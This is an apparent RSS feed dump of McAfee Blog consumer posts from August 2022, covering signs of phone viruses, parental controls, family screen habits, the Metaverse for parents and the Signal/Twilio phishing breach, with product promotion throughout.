  • Ransomware: These prevent you from accessing your phone again unless you pay a ransom to the hacker. The hacker may use personal data like your pictures as blackmail. 
  • Spyware: This tracks your browsing activity, then steals your data or affects your phone’s performance. 
  • Trojan: Aptly named, this type of virus hides inside an app to take control of or affect your phone and data. 

How do phones get viruses?

Smartphones and computers get viruses in a similar way. The most common include: 

  • Clicking on links or attachments from unverified sources. These are most commonly distributed as emails and SMS. 
  • Clicking on seemingly innocent ads that take you to an unsecured webpage or download mobile malware to your device. 
  • Visiting suspicious websites, often by ignoring security warnings. 
  • Downloading malicious apps from an unverified source, usually outside the Apple App Store or Google Play Store. 
  • Connecting your phone to an unsecured internet connection like public Wi-Fi (McAfee offers a secure VPN that makes it safe to use unsecured Wi-Fi networks by encrypting your data.) 

7 signs your phone has a virus

Now that you know how your phone could be the target of a virus, look out for these seven signs to determine if your device has been infected with malicious software. 

You see random pop-up ads or new apps 

Most pop-up ads don’t carry viruses but are only used as marketing tools. However, if you find yourself shutting pop-up ads more often than usual, it might indicate a virus on your phone. 

Don’t open any apps in your library that you don’t remember installing. Instead, uninstall them immediately. These apps tend to carry malware that’s activated when the app is opened or used. 

Your device feels physically hot

Your phone isn’t built to support malware. When you accidentally download apps that contain malware, the device has to work harder to continue functioning. In this case, your phone might be overheating. 

Random messages are sent to your contacts

If your contacts receive unsolicited scam emails or messages on social media from your account, especially those containing suspicious links, a virus may have accessed your contact list. It’s best to let all the recipients know that your phone has been hacked so that they don’t download any malware themselves or forward those links to anybody else. 

The device responds slowly

An unusually slow-performing device is a hint of suspicious activity on your phone. The device may slow down because it needs to work harder to support the downloaded virus. Alternatively, unfamiliar apps might be taking up storage space and running background tasks, causing your phone to run slowly. 

You find fraudulent charges on your accounts

Be sure to follow up on charges on your credit card or transactions in your banking statements that you don’t recognize. It could be an unfamiliar app or malware making purchases through your account without your knowledge. 

The phone uses excess data

A sudden rise in your data usage or phone bill can be suspicious. A virus might be running background processes or using your internet connection to transfer data out of your device for malicious purposes. 

Your battery drains quickly

An unusually quick battery drain may also cause concern. Your phone will be trying to meet the energy requirements of the virus, so this problem is likely to persist for as long as the virus is on the device. 

How can I check if my phone has a virus?

You may have an inkling that a virus is housed inside your phone, but the only way to be sure is to check.  

An easy way to do this is by downloading a trustworthy antivirus app. The McAfee Mobile Security app scans for threats regularly and blocks them in real time. It prevents suspicious apps from attaching themselves to your phone and secures any public connections you might be using. 

How to remove a virus from Android and iPhone

If you detect a virus on your iPhone or Android device, there are several things you can do.  

  • Download antivirus software like McAfee’s award-winning antivirus software or a mobile security app to help you locate existing viruses and malware. By identifying the exact problem, you know what to get rid of and how to protect your device in the future. 
  • Do a thorough sweep of your app library to make sure that whatever apps are on your phone were downloaded by you. Delete any apps that aren’t familiar. 
  • To protect your information, delete any sensitive text messages and clear history regularly from your mobile browsers. Empty the cache in your browsers and apps. 
  • In some instances, you may need to reboot your smartphone to its original factory settings. This can lead to data loss, so be sure to back up important documents to the cloud. 
  • Create strong passwords for all your accounts after cleaning up your phone. You can then protect your passwords using a password management system like McAfee True Key, which uses the most robust encryption algorithms available so only you have access to your information.  

7 tips to protect your phone from viruses

It’s never too late to start caring for your phone. Follow these tips to stay safe online and help reduce the risk of your phone getting a virus. 

  • Only download an app from a trusted source, i.e., the app store or other verified stores. You should read app reviews and understand how the app intends to use your data. 
  • Set up strong, unique passwords for your accounts instead of using the same or similar passwords. This prevents a domino effect in case one of the accounts is compromised. 
  • Think twice before you click on a link. If you believe it looks suspicious, your gut is probably right! Avoid clicking on it until you have more information about its trustworthiness. These links can be found across messaging services and are often part of phishing scams. 
  • Clear your cache periodically. Scan your browsing history to get rid of any links that seem suspicious. 
  • Avoid saving login information on your browsers and log out when you’re not using a particular browser. Although this is a convenience trade-off, it’s harder for malware to access accounts you’re not logged into during the attack.  
  • Update your operating system and apps frequently. Regular updates build upon previous security features. Sometimes, these updates contain security patches created in response to specific threats in prior versions. 
  • Don’t give an app all the permissions it asks for. Instead, you can choose to give it access to certain data only when required. Minimizing an application’s access to your information keeps you safer. 

Discover how McAfee Mobile Security keeps your phone safe

McAfee Mobile Security is committed to keeping your mobile phone secure, whether it’s an iPhone or Android device. In addition to regularly scanning your phone to track suspicious activity, our technology responds to threats in real time. Our comprehensive tools also secure your internet connections and let you browse peacefully. Using our app makes sure that your phone and data are protected at all times.  

So, what are you waiting for? Download McAfee Mobile Security today!  

The post 7 Signs Your Phone Has a Virus and What You Can Do appeared first on McAfee Blog.

]]>
8 Signs It May Be Time for Parental Controls https://www.mcafee.com/blogs/family-safety/8-signs-it-may-be-time-for-parental-controls/ Wed, 24 Aug 2022 11:43:46 +0000 /blogs/?p=124853

Equipping and guiding your digitally connected child is one of the toughest challenges you will face as a parent. As...

The post 8 Signs It May Be Time for Parental Controls appeared first on McAfee Blog.

]]>

Equipping and guiding your digitally connected child is one of the toughest challenges you will face as a parent. As your child grows and changes, so too will their online activities. Friend groups, favorite apps, and online interests can shift from one month to the next, which is why parental controls can be a parent’s best friend.  

According to a report from Common Sense Media, teens spend an average of seven hours and 22 minutes on their phones a day. Tweens (ages 8 to 12) spend four hours and 44 minutes daily. This is time outside of schoolwork. 

That is a lot of time to stroll the streets of cyberspace for entertainment purposes, and it’s only increased since the pandemic.  

Striking a balance between screen time and healthy device use is an always-evolving challenge. On the one hand, your child’s device is an essential channel connecting them to their self-identity, peer acceptance, and emotional well-being. On the other hand, that same device is also the door that can bring issues such as cyberbullying, predators, risky behavior, and self-image struggles into your child’s life.  

Raising the Safety Bar 

Parental controls are tools that allow parents to set controls on their children’s internet use. Controls include content filters (inappropriate content), usage limits (time controls), and monitoring (tracking activity). 

Many of the technology your family already owns or sites your kids visit have basic parental controls (i.e., built-in controls for android and iPhone and social networks such as YouTube). However, another level of parental control comes in software specifically engineered to filter, limit, and track digital activity. These consumer-designed parental controls offer families a higher, more powerful form of protection.  

 If you are like many parents who land on this blog, you’ve hit a rough patch. You have concerns about your child’s online activity but aren’t sure how to begin restoring balance. Rightly, you want to find the best parental control software and put digital safeguards in place.  

8 Signs Your Family Needs Parental Controls 

Every family dynamic is different, as is every family’s approach to online monitoring. However, most parents can agree that when a negative influence begins to impact the family’s emotional and physical health, exploring new solutions can help get you back on track.  

Depending on your child’s age, you may need to consider parental controls if:  

 1. They don’t respond when you talk to them  

If your child is increasingly engrossed in their phone and it’s causing communication issues in your family, you may want to consider software that includes time limits. Connecting with your child during device-free time can improve communication.  

2. They’ve started ignoring homework and family responsibilities  

There are a lot of reasons grades can plummet, or interests can fade. However, if your child is spending more and more time online, limiting or monitoring what goes on in that time can help restore emotional balance and self-discipline to meet responsibilities.  

3. Their browser history shows access to risky content  

Innocent online searches can lead to not so innocent results or children may go looking for content simply because they’re curious. Parental controls automatically block age-inappropriate sites and filter websites, apps, and web searches.  

4. They won’t give you their device without a fight  

If the phone has become the center of your child’s world at the cost of parental respect and family rules, they may be engaged in inappropriate behavior online, connecting with the wrong friends, or struggling with tech balance. With the proper parental controls, a parent can block risky content, view daily activity, and set healthy time limits.  

5. They’re losing interest in family outings and other non-digital activities  

Poor habits form quietly over time. If your child has dramatically changed their focus in the past three to six months, consider zooming in on why. It may not be technology use, but you may consider an additional layer of protection if it is.   

6. They go into another room to respond to a text  

While everyone deserves privacy, if constantly sneaking away to communicate with a friend is your child’s new norm, you may consider making some screen time adjustments.  

7. They are exhausted  

Unbeknownst to parents, kids might be exchanging sleep for screen time. Parental controls can help you nip this unhealthy habit. Setting time limits can help kids experience deeper sleep, better moods, more focus, and more energy. 

8. They overshare online  

If you browse through your child’s social media and notice their profiles are public instead of private, or if your child tends to overshare personal information, parental controls can help you monitor future activity. 

Ideally, we’d all prefer to live in a world where we didn’t need parental controls at all. Unfortunately, that is neither a present nor future reality. So, we recalibrate, keep learning, and keep adding to our parenting skills. As always, we believe the first go-to digital safety tool is investing in consistent open and honest conversation with your child. And the second tool? Yup, reach for the parental controls. While you may hear some hemming and hawing from your kids at first, the peace of mind you gain from having parental controls in place will be worth it.  

The post 8 Signs It May Be Time for Parental Controls appeared first on McAfee Blog.

]]>
McAfee launches Impact Report: How we’re doing and the opportunities ahead  https://www.mcafee.com/blogs/internet-security/mcafee-launches-impact-report-how-were-doing-and-the-opportunities-ahead/ Wed, 24 Aug 2022 11:00:54 +0000 https://www.mcafee.com/blogs/?p=157989

Today, we publish our annual Impact Report. In our 2021 report, we highlight initiatives and share stories about our progress...

The post McAfee launches Impact Report: How we’re doing and the opportunities ahead  appeared first on McAfee Blog.

]]>

Today, we publish our annual Impact Report. In our 2021 report, we highlight initiatives and share stories about our progress in creating a more inclusive workplace, supporting our communities, and protecting the planet.

Reflecting on 2021, it’s easy to see it was a monumental year for McAfee. Our business underwent an incredible transformation — we divested our Enterprise business and McAfee emerged as a worldwide leader for online protection, empowering individuals and families to live a safer life online. We also kicked off our journey to become a privately held company.

Our strides toward a better future

As we accelerate our journey as a dedicated consumer business and I evaluate our strides since our first report in 2018, I am humbled by our progress. In the last year, we’ve seen our representation for women reach 30.9% overall and for underrepresented professionals reach 14.8 percent. In addition, we’ve seen a 40% increase in the proportion of women promoted to director and above in the last year.

We maintained pay parity for women globally and underrepresented professionals in the U.S with our most recent audit revealing no disparities. We rolled out a new inclusion and awareness training and were recognized as the best company for multicultural women and dads. We prioritized our people’s well-being with a rollout of the Calm app, fitness challenges, and a week focused on wellness.

All the while, McAfee rose to meet the increased needs of our community with laptop donation programs and employee giving campaigns. We also made progress for sustainability redefining how and where we work.

The opportunities ahead to do better

However, it’s not lost on me that 2021 followed a year fraught with challenges that didn’t disappear with the end of 2020. And today, we continue to live and work against the backdrop of a global pandemic, respond to acts of racial injustice, and hear undeniable lived experiences of hate and intolerance.

It’s fueled our desire to do better. We know there is so much work to do and our responsibility to create an equitable workplace and world has never been greater. It’s the right thing to do and a business imperative—we rely on the fresh ideas and unique perspectives of the people of McAfee. Truthfully, it’s their tenacity and resiliency that inspire me.

Whether it’s showing up for one another during a COVID-19 surge, asking for more resources to become a better ally, or rallying around each other to prioritize health, our people are exceptional.

As we progress in 2022, grow as a consumer-focused business, and welcome our new President and CEO Greg Johnson, we will have the opportunity to take all we’ve learned and help turn our aspirations into reality. We will invest in our people, our community, and our planet, but also ask what we can do better.

I invite you to read our 2021 Impact Report to see our progress and our commitment.

The post McAfee launches Impact Report: How we’re doing and the opportunities ahead  appeared first on McAfee Blog.

]]>
5 Ways to Reset Your Family’s Digital Habits this Summer https://www.mcafee.com/blogs/family-safety/5-ways-to-reset-your-familys-digital-habits-this-summer/ Tue, 23 Aug 2022 14:04:19 +0000 /blogs/?p=120673 online safety Digital Habits

Ahhhh. Can you feel it? Summer is so close. Everything feels a little more buoyant, a little brighter. We’re in...

The post 5 Ways to Reset Your Family’s Digital Habits this Summer appeared first on McAfee Blog.

]]>
online safety Digital Habits

Ahhhh. Can you feel it? Summer is so close. Everything feels a little more buoyant, a little brighter. We’re in the home stretch of social distancing, a sense of normalcy is returning, and there’s a collective energy that’s ready to throw the screen door open, run outside, and pounce on summer.

There’s no doubt you’ve established great digital ground rules that worked well during quarantine. However, as we begin the mental trek toward some degree of our former life, summer may be the perfect window to think about a digital reset.

A reset is simply taking a moment to pause, assess, and adjust where it makes sense. Consider what digital expectations and ground rules you established during the pandemic, what worked for your family, and what needs to be phased out before the new school year approaches.

Where we’ve been

We know that during quarantine (and even after), kids’ screen time doubled for several reasons, including learning from home, needing to connect with friends online more, and boredom. During the pandemic, we also knew that helping kids manage the ongoing stress of homebound life was crucial for helping them maintain digital, emotional, and physical health. All of these factors impacted our digital routines and expectations.

Where we’re going                 

Summer routines will look different for every family. Some students are attending school on site throughout the summer as many districts strive to bridge 2020 learning losses. Other students will enjoy a traditional summer break before starting back to school in a few months.

Whichever way your family’s summer routine rolls out, here are a few small shifts you can begin making today that will slowly help you re-establish smart digital habits.

5 ways to reset your digital habits

1. Pause, assess, adjust.  Stop to evaluate the role technology has grown to occupy in your home over the past year. Assess your family’s screen time and device habits that shifted or grew. Where do you need to help your kids slowly pull back? How many hours a day do the kids play video games? How much TikTok or YouTube scrolling is going on? Are the TV binges out of control? Is there still a phone curfew in place, or have kids started taking their phones to bed?

2. Give parental controls a go.  If you gave your kids a little more device freedom during the pandemic and put the idea of  parental controls on hold, summer is a great time to give this option a go. Test monitoring features, content filters, and make adjustments that fit your family’s needs. If your goal for your kids is less device time and more outside time this summer, parental controls include screen limits to help you reset any poor habits that have set in.

3. Safety and Privacy revamp. During summer especially, take time to understand the friends your kids connect with online – new friend groups can form over the summer. Review privacy and location settings on apps. Teens often leave their location on for one another so they can find things to do. This practice isn’t always a good idea since location-based apps can open your family up to risks.

4. Screen-free zones.  Another wise habit that may have gone by the wayside is creating screen-free zones such as the dinner table, the bedroom, restaurants, and family trips. Setting a tech curfew is also a great way to help kids get into consistent sleep patterns. These few steps can add hours of family time to your day and give kids a much-needed device break. If you are going on vacation, creating screen-free zones on your trip will ensure you are fully engaged and don’t miss out on the experience.

5. Get a plan.  The summer has a way of flying by, especially if kids end up playing video games, watching YouTube videos, or chatting on social media all day. Get in front of that temptation with a plan. Collaborate on a wish list of things every family member would like to do over the summer. Maybe it’s canoeing, a trip somewhere fun, a family project, volunteering, or a new hobby that taps into their creativity.

As you ease back into new habits, remember to share your reasoning for the reset. Handing down digital edicts rarely sticks, but when kids understand the mental and physical benefits of balancing their technology, they will be more likely to get on board with the change.

The post 5 Ways to Reset Your Family’s Digital Habits this Summer appeared first on McAfee Blog.

]]>
More Apps for Younger Users Emerging. Here’s What Parents Need to Know. https://www.mcafee.com/blogs/family-safety/more-apps-for-younger-users-emerging-heres-what-parents-need-to-know/ Sun, 21 Aug 2022 13:17:39 +0000 /blogs/?p=120679

More and more social platforms are coming up with safer ways for younger kids to access their apps. The most...

The post More Apps for Younger Users Emerging. Here’s What Parents Need to Know. appeared first on McAfee Blog.

]]>

More and more social platforms are coming up with safer ways for younger kids to access their apps. The most recent announcement comes from Facebook who is reportedly creating a version of Instagram for kids 13 and under.

It’s a family safety win to see so many companies (YouTube, TikTok, and Facebook have parental control channels) making changes. That’s because currently, kids under 13 have no problem getting around an app’s age restrictions, a decision that can expose them to risks such as cyberbullying, stranger connections, and inappropriate content.

With apps making an overall shift toward safer experiences, areas of concern for families still exist especially since kids are increasingly connecting with social media companies before they enter middle school. Here are just a few things to consider as your child moves into the world of social networking, regardless of his or her age.

Family Talking Points

  1. The emotional side of social. Not all social networks work the same. Instagram is photo-based, which means a child’s experience may impact self-esteem and mental health more so than a network that is solely text-based. Consider talking to your child about the risks often associated with Instagram such as body image, cyberbullying, mental health issues. Regardless of age, it’s important to keep close tabs on a child’s mental health if they spend time online.
  1. Talk about the risks. The years before kids begin using the trendier social networks, is a critical window to have honest, age-appropriate conversations. Consider discussing what kinds of things to look out for online, including bullying, predatory behavior, and inappropriate content.
  1. Explain monetization. While social networks are a way of life for teens today, there’s so much more going on behind the scenes. Consider discussing the concept of monetization with your kids so they are aware of the businesses churning behind social networks. Cultivating the next generation of untapped users is a huge piece of a tech company’s strategy. Creating safer avenues for younger kids is a win for parents. However, introducing kids to a platform as early as possible is a big win for tech companies as well.
  1. Discuss personal privacy. One of the biggest risks to kids online — and often the one kids care about the least — is privacy and how social networks collect and use kids’ data. It’s never too early to start talking about privacy and ways to reign in your family’s digital footprint.
  1. Start building digital skills. The tween years are critical to preparing your child to eventually spend more time on social platforms for kids over 13. In addition to privacy, consider other important topics such as digital literacy, cyberbullying, online scams, why parental controls matter, and other important digital skills.

The window between 9-12 is an important one when it comes to teaching kids digital skills and influencing their digital behavior. It’s never too early to begin these conversations. Remember, kids need aware, digitally savvy parents more than ever to prepare them for the challenges ahead.

The post More Apps for Younger Users Emerging. Here’s What Parents Need to Know. appeared first on McAfee Blog.

]]>
A Parent’s Guide To The Metaverse – Part Two https://www.mcafee.com/blogs/family-safety/a-parents-guide-to-the-metaverse-part-two/ Fri, 19 Aug 2022 08:50:11 +0000 https://www.mcafee.com/blogs/?p=158613

Welcome back to part 2 of my Metaverse series. If you are after tips and strategies to help your kids...

The post A Parent’s Guide To The Metaverse – Part Two appeared first on McAfee Blog.

]]>

Welcome back to part 2 of my Metaverse series. If you are after tips and strategies to help your kids navigate the Metaverse safely then you’re in the right place. In this post I’ll share with you how your kids are likely already accessing the Metaverse, the benefits plus how to ensure they have a safe and positive experience. Now, if you’d like a refresher on exactly what the Metaverse is before we get underway, then check out part one here. 

How Many Kids Are Using The Metaverse? 

If your kids have played Roblox, Fortnite or Minecraft then they have already taken the step into this new virtual frontier. Yes, it’s that easy! But how many kids are playing on these platforms?  

So, if you’ve got a couple of kids, tweens or teens in your house, then chances are they have probably already had a Metaverse experience! Or, if not yet, then it won’t be long… 

Is There Any Difference Between Video Games And The Metaverse? 

There are actually a lot of similarities between online video games and the Metaverse including the use of avatars and the availability of items to purchase eg a horse in a game or an NFT (non-fungible token) in the Metaverse. However, the biggest difference is that the Metaverse is not just about gaming – it is so much more. In the Metaverse, there are no limitations to the number of participants nor on the type of activity – you can attend meetings, concerts, socialise without the gaming aspect, even undertake study! 

What Are The Benefits Of The Metaverse For Our Kids? 

There are so many good things about the Metaverse for our kids, particularly from an educational perspective. As a mum of 4, I am really excited at the possibilities the Metaverse will offer our kids. Imagine being able to experience a country in virtual reality – walk around, see the sights, its geographical features. I have no doubt that would enthuse even the most reluctant learners. And a recent US study confirmed this. It found that taking students on a Virtual Reality field trip to Greenland to learn about climate change resulted in higher interest, enjoyment and retention than students who simply watched a traditional 2-D video. How good! 

Taking care of my family’s mental health has always been a huge focus of my parenting approach and I am really excited at the great options the Metaverse can offer in the area. As a family, we’ve spent multiple hours using apps like Calm and Headspace to help us meditate and practice mindfulness. But the thought of being able to don a VR headset and be transported to the actual rainforest or the roaring fire that I often listen to, is even more appealing! One of the best parts of the VR experience is that it completely blocks out the ‘real world’ which would make it easier to stay in the flow. Very appealing! 

And while we’re talking benefits, let’s not gloss over the potential role the Metaverse can play in fostering empathy and promoting understanding between communities. There is a growing group of digital creators who are designing Metaverse experiences to do this using Virtual Reality. Homeless Realities is a project from the University of Southern California (USC) where students use virtual reality to tell stories, usually of marginalized communities that have been overlooked by traditional journalism. So powerful! 

How Do We Keep Our Kids Safe? 

As parents, it’s essential that we add the Metaverse to our list of things to get our head around so we can keep our kids safe. Here are my top tips: 

1. Commit To Understanding How It All Works 

While I very much appreciate you reading this post, it’s important that you take action and get involved – particularly if your kids are already. If your kids are using Minecraft, Fortnite or Roblox – sign up and understand yourself how it all works. If your kids have a VR headset and you’re not sure how it works – ask them for a turn and a lesson. Only by experiencing it for yourself, will you truly understand the attraction but also the pitfalls and risks.   

2. Direct Your Kids To Age Appropriate Platforms 

As the Metaverse is still evolving and very much a work in progress, there are very minimal protections in place for users. However, the 3 platforms that tend to attract younger players (Roblox, Minecraft and Fortnite) all have parental control features. So, please direct them here – if you can – as you’ll be able to have more control over their online safety. 

Minecraft and Fortnite allow parents to disable chat functions which means your kids can’t communicate with people they don’t know. Roblox will automatically apply certain safety settings depending on the age group of their account. But regardless of what their platform of choice is, always protect your credit card details!! I know Fortnite will only allow kids to make ‘in game’ purchases if these supply credit card details in the checkout. 

3. Make Online Safety Part Of Your Family’s Dialogue 

If your kids are older, it’s likely, you’ll have far less say over where they spend their time in the Metaverse so that’s when your kids will need to rely on their cyber safety skills to help them make safe decisions. Now, don’t assume that your child’s school has ticked the cyber safety box and it’s all been taken care of. Cybersafety needs to be weaved into your family’s dialogue and spoken about regularly. Even from the age of 5, your kids should know that they shouldn’t talk to strangers online or offline, if they see something that makes them upset online then they need to talk to a parent asap and, that they should never share their name or anything that could identify them online.  

The goal of this is to make safe online behaviour part of their routine so that when they are faced with a challenging situation anywhere online, they automatically know how to respond. And of course, as kids get older, the advice becomes appropriate to their age. 

4. Don’t Forget About Physical Safety Too 

Most kids are busting to get access to a VR headset but please take some time to do your research to work out which headsets are more suitable for your kids and your lounge room! There are 2 basic types: some that require a ‘tethered’ connection to a PC or standalone models with built-in computing power. The tethered headsets have traditionally delivered a more immersive user experience due to the extra computational power the PC provides however experts predict it won’t be long before standalone headsets are just as good. The biggest selling VR headset, Occulus Quest 2, can in fact connect wirelessly to your PC with the option to connect via a cable in case the game or experience needs extra oomph! 

Regardless of which type you choose, it’s important that there is a safe play area in which to use the headset. VR headsets completely removes any visual of the real world so please remove special vases and keepsakes and ensure the dog isn’t roaming around. 

‘Cybersickness’ aka motion sickness can be a real issue for some VR users. When you don the headset and are immersed in a different time and space, your body can get very confused. If your brain thinks you are moving (based on what you are seeing through the headset) but in fact you’re standing still, it creates a disconnect that causes enough confusion to make you feel nauseous. If this happens to your kids, consider reducing the time they spend with the headset, having fewer but smaller sessions to get your ‘VR legs’ and checking the VR headset is being worn correctly. 

So, it’s over to you now parents: it’s time to get involved and understand this Metaverse once and for all. Always start with the games and experiences your kids spend their time on but when you’re ready, make sure you check out some of the more adult places such as Decentraland or The Sandbox. Who knows, you might just become a virtual real estate tycoon or set up a business that becomes quite the side hustle! The sky is the limit in the Metaverse! 

Till next time! 

Alex  

The post A Parent’s Guide To The Metaverse – Part Two appeared first on McAfee Blog.

]]>
Encrypted Messaging Service Hack Exposes Phone Numbers https://www.mcafee.com/blogs/internet-security/encrypted-messaging-service-hack-exposes-phone-numbers/ Thu, 18 Aug 2022 21:37:53 +0000 https://www.mcafee.com/blogs/?p=157715

Many people opt for encrypted messaging services because they like the additional layers of privacy they offer. They allow users...

The post Encrypted Messaging Service Hack Exposes Phone Numbers appeared first on McAfee Blog.

]]>

Many people opt for encrypted messaging services because they like the additional layers of privacy they offer. They allow users to message their closest friends, family, and business partners without worrying about a stranger digitally eavesdropping on their conversation. The same people who message over encrypted services and apps are likely also diligent with securing their internet connections and using a VPN. 

Despite all those safeguards, everyday people are left in the lurch when the companies with which they entrust their information are victims of cyberattacks. That was the case for users of the encrypted messaging app, Signal. Due to a phishing attack and subsequent leak of customer phone numbers, people are looking to identify potential consequences, protect themselves from SIM swapping, monitor their identity, and take measures to make sure their information is safe in the future. 

What Happened?  

A recent cyberattack targeted Signal, an end-to-end encrypted messaging service.1 The attackers exposed about 1,900 phone numbers belonging to Signal users. While other personally identifiable information (PII), message history, and contact lists were spared, valid phone numbers in the hands of a cybercriminal can be enough to wreak havoc on affected users.  

It is likely that another recent and successful phishing scheme at Twilio was the entry point for the Signal hackers. (Signal partners with Twilio to send SMS verification codes to people registering for the Signal app.) At Twilio, phishers tricked employees into divulging their credentials. 

To rectify the situation and protect users, Signal is contacting affected users and asking them to re-register their devices. Also, the company is urging all users to enable registration lock, which is an additional security measure that requires a unique PIN to register a phone with Signal.  

Lessons Learned

There are many lessons not only companies but everyday people can learn from the Signal and Twilio hacks. Here are some ways you can take action at the first signs of a compromised phone number and to help prevent cyber-events like this from happening to you.  

Know the signs of SIM swapping 

SIM swapping occurs when a cybercriminal gets ahold of your cellphone number and a few other pieces of your PII and registers your phone number to a device and a new SIM card that isn’t yours. If they successfully reregister your phone number, they can then access your data, change account passwords, and lock you out of your most important accounts. 

Luckily, since most of us use our phones every day, SIM swapping is usually detected quickly. If your phone isn’t connecting to the network and you’re not receiving calls and texts, it could be a sign that your wireless provider may have reassigned your number to an impersonator. In this case, contact your wireless provider immediately. 

To make SIM swapping nearly impossible, always turn on multifactor authentication. Also known as MFA, multifactor authentication is a method many online accounts use to ensure that only the authorized user can gain entry. This could entail sending a one-time code by email or text, prompting security questions, or scanning for fingerprint or facial recognition in addition to asking for the account password. MFA is an additional layer of security that’s quick to implement. The extra few seconds it takes to type in a code or stand still for a facial scan is well worth the frustration is causes cybercriminals.  

Be selective with whom you share your PII

These days, everyone has dozens of online accounts for everything from banking and shopping to streaming services and gaming. Since you can’t predict which company is going to be breached next, limit the number of possible doors a cybercriminal could break through to access your PII. In the Signal hack, it was their third-party vendor that was likely the cause of the leaked phone numbers. This unpredictability means it’s best to limit sharing your PII with as few accounts as possible. A great practice is to regularly organize your online accounts and deactivate the ones you no longer use. 

Never share your passwords 

A phishing attack seems to have been the first domino to fall in the Twilio and Signal incident. It could’ve been prevented if everyone followed this absolute rule: Never share your password! Your employer nor your bank nor the IRS, for example, will ever ask you for your password to an online account. If you receive correspondence asking you to share your password, no matter how official it looks, do not comply.  

Phishers often lace their electronic correspondences with an urgent or authoritarian tone, threatening severe consequences if they don’t receive a response within a short timeframe. This is a ploy to get people to act too quickly without thinking through the request. If you receive a message that outlines dire consequences for seemingly small infractions, step away from the message for at least 15 minutes and think it through. Stay calm and follow up through official channels, such as a listed phone number on the organization’s website or a customer service chat room, to iron out the alleged situation instead. 

Stay Protected

Diligent cybersecurity habits go a long way toward keeping you and your family’s PII out of the hands of malicious characters. However, in the case you trust a company with your information but it’s leaked in a breach, McAfee Total Protection can give you peace of mind. McAfee Total Protection offers premium security in various areas including antivirus, identity monitoring, secure VPN, Protection Score, and Personal Data Cleanup. Its advanced monitoring abilities are faster and offer broader detection for your identity. Plus, McAfee Total Protection can cover you up to $1 million in identity theft restoration. 

Keep your eyes peeled for cybersecurity news and breaches that may have affected your PII. From there, take action and leverage McAfee services to help you fill in the gaps. 

1The Hacker News, “Nearly 1,900 Signal Messenger Accounts Potentially Compromised in Twilio Hack 

The post Encrypted Messaging Service Hack Exposes Phone Numbers appeared first on McAfee Blog.

]]>
A Parent’s Guide To The Metaverse – Part One https://www.mcafee.com/blogs/family-safety/a-parents-guide-to-the-metaverse-part-one/ Wed, 17 Aug 2022 16:41:07 +0000 https://www.mcafee.com/blogs/?p=157674

We’ve all heard about the Metaverse. And there’s no doubt it has certainly captured the attention of the world’s biggest...

The post A Parent’s Guide To The Metaverse – Part One appeared first on McAfee Blog.

]]>

We’ve all heard about the Metaverse. And there’s no doubt it has certainly captured the attention of the world’s biggest companies: Facebook has changed its name to Meta, Hyundai has partnered up with Roblox to offer virtual test drives, Nike has bought a virtual shoe company and Coca-Cola is selling NFT’s there too. (Non-Fungible Tokens – think digital assets).  

But if you are confused about exactly what this all means and most importantly, what the metaverse actually is, then you are not alone. I’m putting together a 2-part series for parents that will help us get a handle on exactly what this new digital frontier promises and what we need to know to keep our kids safe. It will also ensure we don’t feel like dinosaurs! So, let’s get started. 

What is this Metaverse? 

I think the best way of describing the Metaverse is that it’s a network of online 3D virtual worlds that mimic the real world. Once users have chosen their digital avatar, they can meet people, play games, do business, design fashion items, buy real estate, attend events, earn money, rear a pet – in fact, almost anything they can do in the ‘real’ world! And of course, all transactions are via cryptocurrencies. 

If you are an avid Science Fiction reader, then you may have already come across the term in the 1992 novel ‘Snow Crash’ by Neal Stephenson. In the book, Stephenson envisions a virtual reality-based evolution of the internet in which his characters use digital avatars of themselves to explore the online world. Sounds eerily familiar, doesn’t it?  

Still confused? Check out either the book or Steven Spielberg’s movie adaption of Ernest Cline’s Ready Player One. Set in 2045, the book tells the story of people living in a war-ravaged world on the brink of collapse who turn to OASIS, a massively multiplayer online simulation game that has its own virtual world and currency. In the OASIS, they engage with each other, shop, play games and be transported to different locations.  

How Do You Access The Metaverse? 

The best and most immersive way to access the metaverse is using a Virtual Reality (VR) headset and your internet connection, of course. VR headsets completely take over users’ vision and replace the outside world with a virtual one. Now, this maybe a game or a movie but VR headsets have their own set of apps which once downloaded, allows users to meditate, learn piano, work out at the gym or even attend a live concert in the metaverse!  

Now access to the Metaverse is not just limited to those who own expensive headsets. Anyone with a computer or a smartphone (that is internet connected) can also have a metaverse experience. Of course, it won’t be as intense or immersive as the VR headset experience but it’s still a commonly used route to access the metaverse. Some of these ‘worlds’ suggest users can access their world using smartphones however experienced users don’t think this is a good idea as phones don’t have the necessary computational power to explore the metaverse properly. 

As some of the most popular metaverse worlds can be accessed using your computer, why not check out Decentraland, The Sandbox, Somnium or even Second Life. In most of these worlds, users don’t have to create an account or spend money to start exploring however if you want the full experience then you’ll need to do so.  

How Much Does It Cost? 

Entering the metaverse doesn’t cost anything, just like going on the internet doesn’t cost anything – apart from your internet connection and hardware, of course! And don’t forget that if you want a truly immersive 3D experience, then you might want to consider investing in a VR headset. 

But, if you do want to access some of the features of the metaverse and invest in some virtual real estate or perhaps buy yourself a Gucci handbag, then you will need to put your hand into your virtual pocket and spend some of your virtual dollars. But the currency you will need depends entirely on the metaverse you are in. 

Decentraland’s currency MANA is considered to be the most commonly used currency in the metaverse and also one of the best to invest in, according to some experts. MANA can be used to buy land, purchase avatars, names, wearables, and other items in the Decentraland marketplace. 

The Sandbox has a different currency, SAND, which is also used to buy items from The Sandbox marketplace. This is the second most popular currency however be prepared to buy the currency of the world you choose to spend your time in. 

Now, I totally appreciate that the whole concept of the Metaverse is a lot to get your head around. But if you have a tribe of kids, then chances are they are going to want to be part of it so don’t put it in the too-hard basket. Take some time to get your head around it: do some more reading, talk to your friends about it and check out some of the metaverses that you can access from your PC. Nothing beats experiencing it for yourself! 

In Part 2, I will be sharing my top tips and strategies to help us, parents, successfully guide our kids through the challenges and risks of the metaverse. So watch out for that. 

Till, next time – keep researching! 

 

Alex x 

The post A Parent’s Guide To The Metaverse – Part One appeared first on McAfee Blog.

]]>
Back to School: Tech Savvy vs. Cyber Savvy https://www.mcafee.com/blogs/family-safety/back-to-school-tech-savvy-vs-cyber-savvy/ Fri, 12 Aug 2022 09:34:16 +0000 https://www.mcafee.com/blogs/?p=157600

The first day of school is right around the corner. The whole family is gearing up for a return to...

The post Back to School: Tech Savvy vs. Cyber Savvy appeared first on McAfee Blog.

]]>

The first day of school is right around the corner. The whole family is gearing up for a return to the routine: waking up to alarm clocks at dawn, rushed mornings, learning all day, and after-school activities and homework all night. 

